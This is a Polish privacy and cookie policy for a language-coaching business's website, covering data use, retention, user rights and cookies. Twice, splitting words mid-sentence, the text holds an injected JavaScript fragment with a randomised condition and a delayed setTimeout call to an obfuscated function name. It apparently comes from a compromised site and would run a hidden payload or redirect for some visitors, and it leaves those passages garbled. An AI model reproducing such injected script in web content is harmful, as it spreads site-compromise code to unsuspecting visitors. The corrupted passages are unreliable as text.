Wypełniając formularz kontaktowy zawarty na stronie internetowej www.doorway.edu.pl, udostępniacie nam Państwo swoje dane osobowe.

Na naszej stronie internetowyej korzystamy dodatkowo z plików cookies.

W przypadku podjęcia współpracy z naszą firmą (Marc Labranche Language Coaching), czy to w roli Klienta czy Nauczyciela, będziemy przetwarzali Państwa dane osobowe, zawarte w treści umowy, którą podpiszemy.

Informacje o administratorze

Administratorem Państwa danych osobowych, które przekazali nam Państwo poprzez wypełnienie formularza zawartego na stronie jest firma Marc Labranche Language Coaching.

Cel i czas przetwarzania danych osobowych

Dane pozostawione w celach kontaktowych, wykorzystamy wyłącznie do kontaktu z Państwem, w  trakcie którego przedstawimy naszą ofertę, możliwości podjęcia współpracy oraz przekażemy Państwu wszelkie ważne informacje dotyczące naszej działalności.

Pozyskujemy wyłącznie te dane, które są nam niezbędne do realizacji określonych celów – np. kontaktu z Państwem, czy prawidłowej realizacji usług edukacyjnych. Nie przetwarzamy żadnych danych wrażliwych.

Dane pozostawione do kontaktu przechowujemy do czasu nawiązania kontaktu, ale nie dłużej niż przez okres 1 roku, co związane jest z cyklami edukacyjnymi w naszych placówkach.

W przypadku danych kontaktowych kandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andydatów na Nauczycieli – pozostają one w  naszej bazie przez okres rekrutacji.

Celem przetwarzania przez nas danych, zawartych w umowach, które zawieracie Państwo z firmą Marc Labranche Language Coaching jest konieczność zapewnienia odpowiednich, najwyższych standom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andardów i jakości świadczonych przez nas usług, możliwość kontaktu z Państwem, możliwość realizacji ewentualnych reklamacji czy skarg związanych z usługami świadczonymi przez nas, jak również dokonywanie analizy danych, pozwalającej nam na stałą pracę nad rozwojem i jakością świadczonych przez nas usług.

Nie profilujemy Państwa danych, nie przekazujemy ich poza naszą firmę, ani ich nie sprzedajemy. W przypadku ich udostępniania innym podmiotom, robimy to wyłącznie w celach związanych z naszą działalnością i tylko w takim zakresie, w jakim jest to niezbędne do realizacji określonego zadania (np. wydruk dyplomów, czy świadczenie usług księgowych).

Uprawnienia osób, które przekazały nam swoje dane

Możecie Państwo zażądać od firmy Marc Labranche Language Coaching, która będzie administratorem Państwa danych osobowych aktualizacji lub usunięcia części lub wszystkich pozostawionych przez Państwa informacji. Dyspozycję tę zrealizujemy niezwłocznie, z wyłączeniem informacji, które są nam niezbędne bądź to z powodów obowiązujących przepisów (np. kopie wystawionych faktur), bądź z powodów prawnych (np. umowy, dowód zaprzestania przetwarzania danych). Możecie Państwo żądać informacji dotyczących Państwa danych, które przetwarzamy oraz celu ich przetwarzania, złożyć sprzeciw dotyczący przetwarzania danych osobowych w określonych celach, a także złożyć żądanie przeniesienia danych osobowych na rzecz wskazanych odbiorców.

Jeżeli uznacie Państwo, że nasze działania naruszają obowiązujące prawo, możecie Państwo złożyć skargę do organu nadzoru –Prezesa Urzędu Ochrony Danych Osobowych, informacje dotyczące sposobu zgłaszania skargi dostępne są pod adresem: https://uodo.gov.pl/pl/83/155

Cookies

Nasza strona internetowa www.doorway.edu.pl korzysta z plików cookies.

Pliki cookies są to niewielkie pliki, zawierające informacje tekstowe, związane z Państwa aktywnością na naszej stronie internetowej, takich jak np. kliknięte odnośniki, czas aktywności na stronie, pobrane ze stron pliki, informacje o lokalizacji użytkownika, dzięki temu pozyskujemy informacje, które pozwalają nam na poprawianie jakości, wydajności oraz funkcjonalności naszego serwisu.

W większości przeglądarek domyślnie ustawiona jest zgoda na wykorzystywanie plików cookies.

Możecie Państwo ograniczać lub blokować możliwość korzystania z plików cookies za pomocą ustawień przeglądarki, z której korzystacie. Sposób modyfikacji ustawień zależny jest od rodzaju przeglądarki i opisany w jej instrukcji obsługi.

Więcej informacji na temat plików cookies możecie znaleźć Państwo w internecie – np. w serwisie www.ciasteczka.org lub http://wszystkoociasteczkach.pl

Zabezpieczenia

W celu zapewnienia bezpieczeństwa podanym przez Państwa danym stosujemy zabezpieczenia w  postaci ograniczania dostępu.

Ograniczenie dostępu dotyczy systemów IT używanych do przechowywania danych osobowych, do których dostęp mają wyłącznie osoby przez nas upoważnione.

Używane przez nas systemy IT i sprzęt komputerowy spełniają aktualne wymogi bezpieczeństwa, w  tym poprzez użycie programów antywirusowych oraz bieżące aktualizacje.